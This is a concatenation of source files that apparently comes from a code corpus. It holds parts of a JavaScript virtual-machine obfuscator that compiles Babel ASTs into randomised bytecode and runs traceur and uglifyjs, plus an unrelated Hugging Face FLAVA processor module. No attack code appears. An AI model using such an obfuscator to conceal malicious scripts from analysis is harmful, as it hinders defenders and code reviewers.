zhili.push(RandDataCheise(zhilDx.z190))
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z57))
zhili.push(fbme)
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( 0))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("length"))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z240))
zhili.push(RandDataCheise(zhilDx.z25))
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z90))
startgetType(node.body,variablePool,dyyy)
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z26))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z190))
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z19))
zhili.push(RandDataCheise(zhilDx.z90))
startgetType(node.argument, variablePool, zhili)
}
break
case "BreakStatement":
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
break
case "DebuggerStatement":
zhili.push(RandDataCheise(zhilDx.z194))
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(true))
}
zhili.push(RandDataCheise(zhilDx.z25))
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(RandDataCheise(zhilDx.z190))
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = RandDataCheise(zhilDx.z190);
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z25))
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(RandDataCheise(zhilDx.z190))
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = RandDataCheise(zhilDx.z190);
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = RandDataCheise(zhilDx.z190);
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z192))
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
if (node.init.type == "AssignmentExpression"){
startgetType(node.init.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
if (node.discriminant.type === "AssignmentExpression"){
startgetType(node.discriminant.left, variablePool,zhili)
}
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(zwdz[i]))
}
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(gggcbb.length))
zhili.push(RandDataCheise(zhilDx.z48))
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = RandDataCheise(zhilDx.z190);
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z51))
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z252))
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(RandDataCheise(zhilDx.z10))
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.name))
zhili.push(RandDataCheise(zhilDx.z181))
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.object.type == "AssignmentExpression"){
startgetType(node.object.left, variablePool, zhili)
}
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.property.value))
zhili.push(RandDataCheise(zhilDx.z181))
}else{
startgetType(node.property, variablePool, zhili)
if (node.property.type == "AssignmentExpression"){
startgetType(node.property.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "BinaryExpression":
startgetType(node.right, variablePool, zhili)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, zhili)
}
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator]]))
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(RandDataCheise(zhilDx.z44))
}else if (node.operator == "typeof"){
zhili.push(RandDataCheise(zhilDx.z49))
}else if (node.operator == "!"){
zhili.push(RandDataCheise(zhilDx.z60))
}else if (node.operator == "-"){
zhili.push(RandDataCheise(zhilDx.z50))
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(RandDataCheise(zhilDx.z55))
}else if (node.operator == "void"){
zhili.push(RandDataCheise(zhilDx.z56))
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
if (node.arguments[i].type == "AssignmentExpression" && node.arguments[i].operator == "="){
startgetType(node.arguments[i].left, variablePool, zhili)
}
}
startgetType(node.callee, variablePool, zhili)
if (node.callee.type == "AssignmentExpression"){
startgetType(node.callee.left, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z150))
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.id.name))
zhili.push(RandDataCheise(zhilDx.z181))
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(bcxh))
zhili.push(RandDataCheise(zhilDx.z181))
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(RandDataCheise(zhilDx.z1810))
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(RandDataCheise(zhilDx.z104))
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z58))
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z45))
break
case "ArrayExpression":
zhili.push(RandDataCheise(zhilDx.z105))
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z40))
}
break;
case "RegExpLiteral":
zhili.push(RandDataCheise(zhilDx.z8))
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(RandDataCheise(zhilDx.z195))
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(RandDataCheise(zhilDx.z197))
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(RandDataCheise(zhilDx.z200))
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
startgetType(node.left, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z20))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z291))
zhili.push(RandDataCheise(zhilDx.z90))
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z32))
zhili.push(RandDataCheise(zhilDx.z90))
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx["z"+dat[node.operator.replace("=","")]]))
zhili.push(RandDataCheise(zhilDx.z90))
}else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
if (node.right.type == "AssignmentExpression"){
startgetType(node.right, variablePool, zhili)
startgetType(node.right.left, variablePool, zhili)
}else{
startgetType(node.right, variablePool, zhili)
}
zhili.push(RandDataCheise(zhilDx.z290))
}
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(RandDataCheise(zhilDx.z47))
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z46))
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(RandDataCheise(zhilDx.z200))
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
function startfun(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
for (let i =0; i< node2.params.length; i++){
if (node2.params[i].type === "AssignmentPattern"){
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'])
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
}else{
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z10))
changlc[name]['zhili'].push(toPool(node2.params[i].name))
}
}
changlc[name]['zhili'].push(RandDataCheise(zhilDx.z2))
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'])
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(RandDataCheise(zhilDx.z10))
hb.push(toPool(i))
}
}
hb.push(RandDataCheise(zhilDx.z1))
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
function start(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
let node = node2.program.body
for (let i = 0; i < node.length; i++){
startgetType(node[i], changlc[name]['variablePool'], changlc[name]['zhili'])
}
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(RandDataCheise(zhilDx.z10))
hb.push(toPool(i))
}
}
hb.push(RandDataCheise(zhilDx.z1))
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
start(ast)
cood = ``
datatext = "var constantPool = "+ JSON.stringify(constantPool)+"; var changlc = "+ JSON.stringify(changlc)+";\n"+dataText2;
fs.writeFileSync("./outsrc/out.js", cood + datatext, (e)=>{})
}
const tst = + new Date()
const soure = "test.js"
if (offes5 ===1){
process.exec(`traceur --script ./src/${soure} --out ./dist/${soure}`, (error, stdout, stderr) => {
if (!error) {
console.log("es6 to es5 ==> 成功");
cbbjsvmp()
console.log("file is save ==> ./outsrc/out.js");
} else {
console.log("es6 to es5 ==> 失败");
}
});
} else {
cbbjsvmp()
console.log("file is save ==> ./outsrc/out.js");
}
process.exec(`uglifyjs ./outsrc/out.js --compress --mangle --output ./outsrc/out3.js`, (error, stdout, stderr) => {
if (!error) {
console.log("压缩 ==> 成功");
console.log("file is save ==> ./outsrc/out3.js");
process.exec(`node ./tool/pswitch.js`, (error, stdout, stderr) => {
if (!error) {
console.log("pswitch ==> 成功");
console.log("file is save ==> ./outsrc/out2.js");
process.exec(`uglifyjs ./outsrc/out2.js --mangle --output ./outsrc/out2.js`, (error, stdout, stderr) => {
if (!error) {
console.log("压缩 ==> 成功");
console.log("file is save ==> ./outsrc/out4.js");
process.exec(`node ./tool/jsdebugger.js`, (error, stdout, stderr) => {
if (!error) {
console.log("jsdebugger ==> 成功");
console.log("file is save ==> ./outsrc/out4.js");
console.log("user time =>", +new Date()-tst)
} else {
console.log("jsdebugger ==> 失败",error);
}
})
} else {
console.log("压缩 ==> 失败",error);
}
})
} else {
console.log("pswitch ==> 失败", error);
}
})
} else {
console.log("压缩 ==> 失败", error);
}
})
|
27182812/ChatGLM-LLaMA-chinese-insturct | 6,774 | src/transformers/models/flava/processing_flava.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Image/Text processor class for FLAVA
"""
import warnings
from typing import List, Optional, Union
from ...image_utils import ImageInput
from ...processing_utils import ProcessorMixin
from ...tokenization_utils_base import BatchEncoding, PaddingStrategy, PreTokenizedInput, TextInput, TruncationStrategy
from ...utils import TensorType
class FlavaProcessor(ProcessorMixin):
r"""
Constructs a FLAVA processor which wraps a FLAVA image processor and a FLAVA tokenizer into a single processor.
[`FlavaProcessor`] offers all the functionalities of [`FlavaImageProcessor`] and [`BertTokenizerFast`]. See the
[`~FlavaProcessor.__call__`] and [`~FlavaProcessor.decode`] for more information.
Args:
image_processor ([`FlavaImageProcessor`]): The image processor is a required input.
tokenizer ([`BertTokenizerFast`]): The tokenizer is a required input.
"""
attributes = ["image_processor", "tokenizer"]
image_processor_class = "FlavaImageProcessor"
tokenizer_class = ("BertTokenizer", "BertTokenizerFast")
def __init__(self, image_processor=None, tokenizer=None, **kwargs):
if "feature_extractor" in kwargs:
warnings.warn(
"The `feature_extractor` argument is deprecated and will be removed in v5, use `image_processor`"
" instead.",
FutureWarning,
)
feature_extractor = kwargs.pop("feature_extractor")
image_processor = image_processor if image_processor is not None else feature_extractor
if image_processor is None:
raise ValueError("You need to specify an `image_processor`.")
if tokenizer is None:
raise ValueError("You need to specify a `tokenizer`.")
super().__init__(image_processor, tokenizer)
self.current_processor = self.image_processor
def __call__(
self,
images: Optional[ImageInput] = None,
text: Optional[Union[TextInput, PreTokenizedInput, List[TextInput], List[PreTokenizedInput]]] = None,
add_special_tokens: bool = True,
padding: Union[bool, str, PaddingStrategy] = False,
truncation: Union[bool, str, TruncationStrategy] = False,
max_length: Optional[int] = None,
stride: int = 0,
pad_to_multiple_of: Optional[int] = None,
return_image_mask: Optional[bool] = None,
return_codebook_pixels: Optional[bool] = None,
return_token_type_ids: Optional[bool] = None,
return_attention_mask: Optional[bool] = None,
return_overflowing_tokens: bool = False,
return_special_tokens_mask: bool = False,
return_offsets_mapping: bool = False,
return_length: bool = False,
verbose: bool = True,
return_tensors: Optional[Union[str, TensorType]] = None,
**kwargs,
):
"""
This method uses [`FlavaImageProcessor.__call__`] method to prepare image(s) for the model, and
[`BertTokenizerFast.__call__`] to prepare text for the model.
Please refer to the docstring of the above two methods for more information.
"""
if text is None and images is None:
raise ValueError("You have to specify either text or images. Both cannot be none.")
if text is not None:
encoding = self.tokenizer(
text=text,
add_special_tokens=add_special_tokens,
padding=padding,
truncation=truncation,
max_length=max_length,
stride=stride,
pad_to_multiple_of=pad_to_multiple_of,
return_token_type_ids=return_token_type_ids,
return_attention_mask=return_attention_mask,
return_overflowing_tokens=return_overflowing_tokens,
return_special_tokens_mask=return_special_tokens_mask,
return_offsets_mapping=return_offsets_mapping,
return_length=return_length,
verbose=verbose,
return_tensors=return_tensors,
**kwargs,
)
if images is not None:
image_features = self.image_processor(
images,
return_image_mask=return_image_mask,
return_codebook_pixels=return_codebook_pixels,
return_tensors=return_tensors,
**kwargs,
)
if text is not None and images is not None:
encoding.update(image_features)
return encoding
elif text is not None:
return encoding
else:
return BatchEncoding(data=dict(**image_features), tensor_type=return_tensors)
def batch_decode(self, *args, **kwargs):
"""
This method forwards all its arguments to BertTokenizerFast's [`~PreTrainedTokenizer.batch_decode`]. Please
refer to the docstring of this method for more information.
"""
return self.tokenizer.batch_decode(*args, **kwargs)
def decode(self, *args, **kwargs):
"""
This method forwards all its arguments to BertTokenizerFast's [`~PreTrainedTokenizer.decode`]. Please refer to
the docstring of this method for more information.
"""
return self.tokenizer.decode(*args, **kwargs)
@property
def model_input_names(self):
tokenizer_input_names = self.tokenizer.model_input_names
image_processor_input_names = self.image_processor.model_input_names
return list(dict.fromkeys(tokenizer_input_names + image_processor_input_names))
@property
def feature_extractor_class(self):
warnings.warn(
"`feature_extractor_class` is deprecated and will be removed in v5. Use `image_processor_class` instead.",
FutureWarning,
)
return self.image_processor_class
@property
def feature_extractor(self):
warnings.warn(
"`feature_extractor` is deprecated and will be removed in v5. Use `image_processor` instead.",
FutureWarning,
)
return self.image_processor
|
2833844911/cy_jsvmp | 29,993 | jiajianbian.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const {tosanyuan} = require("./tool/tosanyuan")
const {es6toes5} = require("./tool/es5toes6");
const process = require("child_process");
// 是否转es5
offes5 = 0
var fornum = 0
var dat = {"instanceof":1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
datkey[i] = datkey[i]+"="
}
var dp = fs.readFileSync("./jiaquban/df.json") +''
zhilDx = JSON.parse(dp)
function RandDataCheise(data){
var da = Math.floor(Math.random() * data.length);
return data[da]
}
function cbbjsvmp(soure,outpath){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
var dataText2 = fs.readFileSync("./jiaquban/gujia.js") + '';
//es6toes5
dataText = es6toes5(dataText)
var changlc = {}
var constantPool = []
var ast = parser.parse(dataText)
// 使用插件优化代码
ast = renameCj(ast)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
zhili.push(RandDataCheise(zhilDx.z192))
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(RandDataCheise(zhilDx.z190))
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(RandDataCheise(zhilDx.z57))
zhili.push(fbme)
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool( 0))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z22))
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z23))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z10))
zhili.push(toPool("length"))
zhili.push(RandDataCheise(zhilDx.z181))
zhili.push(RandDataCheise(zhilDx.z240))
zhili.push(RandDataCheise(zhilDx.z25))
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z10))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z181))
dyyy.push(RandDataCheise(zhilDx.z90))
startgetType(node.body,variablePool,dyyy)
dyyy.push(RandDataCheise(zhilDx.z23))
dyyy.push(RandDataCheise(zhilDx.z26))
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(RandDataCheise(zhilDx.z190))
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = RandDataCheise(zhilDx.z190);
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
